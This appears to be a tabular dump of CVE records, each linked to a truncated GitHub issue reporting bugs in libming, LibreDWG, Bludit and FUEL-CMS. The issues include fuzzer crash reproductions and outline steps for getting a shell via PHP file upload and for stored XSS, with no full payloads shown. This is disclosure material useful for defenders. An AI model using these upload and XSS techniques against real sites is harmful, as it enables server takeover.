# Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 Allocation size overflow in the listswf at function parseSWF_DEFINEFONTINFO in parser.c:1948. ## Environment Ubuntu 18.04, 64 bit libming 0.4.7 ## Steps to reproduce 1. download file ``` git clone https://github.com/libming/libming.g...
Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948
https://api.github.com/repos/libming/libming/issues/273/comments
0
2023-06-13T07:08:07Z
2023-06-13T07:08:07Z
https://github.com/libming/libming/issues/273
1,754,192,903
273
CVE-2023-36271
2023-06-23T15:15:10.027
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_wcs2nlen at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/681#BUG2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
https://github.com/LibreDWG/libredwg/issues/681#BUG2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2SVG. ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ##BUG1 ``` ./dwg2SVG ../pocs/poc0.bit_utf8_to_TU ==...
[FUZZ] two bugs in dwg2SVG
https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments
3
2023-03-31T04:10:48Z
2023-03-31T13:37:12Z
https://github.com/LibreDWG/libredwg/issues/681
1,648,637,134
681
CVE-2023-36272
2023-06-23T15:15:10.103
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_utf8_to_TU at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/681#BUG1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
https://github.com/LibreDWG/libredwg/issues/681#BUG1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2SVG. ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ##BUG1 ``` ./dwg2SVG ../pocs/poc0.bit_utf8_to_TU ==...
[FUZZ] two bugs in dwg2SVG
https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments
3
2023-03-31T04:10:48Z
2023-03-31T13:37:12Z
https://github.com/LibreDWG/libredwg/issues/681
1,648,637,134
681
CVE-2023-36273
2023-06-23T15:15:10.160
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/677#BUG1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
https://github.com/LibreDWG/libredwg/issues/677#BUG1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484 ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ## BUG1 ``` /li...
[FUZZ] two bugs in dwg2dxf
https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments
2
2023-03-30T04:10:56Z
2023-04-04T14:03:23Z
https://github.com/LibreDWG/libredwg/issues/677
1,646,878,719
677
CVE-2023-36274
2023-06-23T15:15:10.213
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_write_TF at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/677#BUG2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
https://github.com/LibreDWG/libredwg/issues/677#BUG2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484 ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ## BUG1 ``` /li...
[FUZZ] two bugs in dwg2dxf
https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments
2
2023-03-30T04:10:56Z
2023-04-04T14:03:23Z
https://github.com/LibreDWG/libredwg/issues/677
1,646,878,719
677
CVE-2020-20210
2023-06-26T18:15:09.407
Bludit 3.9.2 is vulnerable to Remote Code Execution (RCE) via /admin/ajax/upload-images.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/bludit/bludit/issues/1079" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "10A81FA4-0E1B-4680-A04F-E4D2267A98E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
https://github.com/bludit/bludit/issues/1079
[ "Exploit", "Issue Tracking" ]
github.com
[ "bludit", "bludit" ]
### A Code Execution Vulnerability in Bludit v3.9.2 #### There is a Code Execution Vulnerability which allow to get server permissions,the url is /admin/ajax/upload-images #### 1, login with any account which allows you to edit content ![image](https://user-images.githubusercontent.com/35037256/64001984-9b44d800...
Bludit v3.9.2 Code Execution Vulnerability in "Images Upload"
https://api.github.com/repos/bludit/bludit/issues/1079/comments
5
2019-08-30T07:47:59Z
2019-10-24T18:24:36Z
https://github.com/bludit/bludit/issues/1079
487,339,964
1,079
CVE-2020-22151
2023-07-03T21:15:09.240
Permissions vulnerability in Fuel-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted zip file to the assests parameter of the upload function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/551" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72", "versionEndExcluding": null, "versionEndIncluding": null, "version...
https://github.com/daylightstudio/FUEL-CMS/issues/551
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
1. First create a php file that executes the command and compress the php file into a zip <img width="606" alt="1" src="https://user-images.githubusercontent.com/9522862/74303980-98127100-4d96-11ea-9b59-101e6d44d889.png"> <img width="320" alt="2" src="https://user-images.githubusercontent.com/9522862/74304008-b11b22...
getshell in assets
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/551/comments
1
2020-02-12T04:56:19Z
2020-09-30T20:49:24Z
https://github.com/daylightstudio/FUEL-CMS/issues/551
563,752,895
551
CVE-2020-22152
2023-07-03T21:15:09.293
Cross Site Scripting vulnerability in daylight studio FUEL- CMS v.1.4.6 allows a remote attacker to execute arbitrary code via the page title, meta description and meta keywords of the pages function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/552" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72", "versionEndExcluding": null, "versionEndIncluding": null, "version...
https://github.com/daylightstudio/FUEL-CMS/issues/552
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
Stored xss in Page title, Meta description, Meta keywords of pages <img width="1140" alt="xss1" src="https://user-images.githubusercontent.com/9522862/74311085-9a31fb00-4da9-11ea-84a0-b65eb76ba02b.png"> <img width="1146" alt="xss2" src="https://user-images.githubusercontent.com/9522862/74311126-aae27100-4da9-11ea-9f8...
XSS in pages
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/552/comments
0
2020-02-12T07:10:34Z
2021-04-15T18:33:49Z
https://github.com/daylightstudio/FUEL-CMS/issues/552
563,798,483
552
CVE-2020-22153
2023-07-03T21:15:09.340
File Upload vulnerability in FUEL-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file to the upload parameter in the navigation function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/553" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72", "versionEndExcluding": null, "versionEndIncluding": null, "version...
https://github.com/daylightstudio/FUEL-CMS/issues/553
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
<img width="837" alt="c1" src="https://user-images.githubusercontent.com/9522862/74326653-bc397680-4dc5-11ea-9e41-c24b32bf4bad.png"> upload function: <img width="1006" alt="c2" src="https://user-images.githubusercontent.com/9522862/74326673-c3608480-4dc5-11ea-89d8-9246baff623c.png"> $This-> fuel-> navigation-> u...
Code execution in navigation/upload
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/553/comments
0
2020-02-12T10:44:49Z
2020-09-30T21:04:55Z
https://github.com/daylightstudio/FUEL-CMS/issues/553
563,911,041
553